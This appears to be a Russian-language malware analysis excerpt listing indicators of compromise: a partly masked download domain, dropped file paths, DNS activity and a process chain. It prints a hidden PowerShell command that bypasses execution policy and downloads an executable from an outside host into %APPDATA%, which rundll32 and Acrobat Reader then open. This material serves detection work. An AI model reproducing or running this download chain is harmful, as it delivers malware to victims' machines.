Техническая информация
- http://ma######gintelligence.tech/guggg/dnbaeymt2wekozk.exe как %appdata%\order
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\order
- 'ma######gintelligence.tech':80
- DNS ASK ma######gintelligence.tech
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma######gintelligence.tech/guggg/DNBAeYMT2WEKoZK.exe','%APPDATA%\Order...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Order
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Order"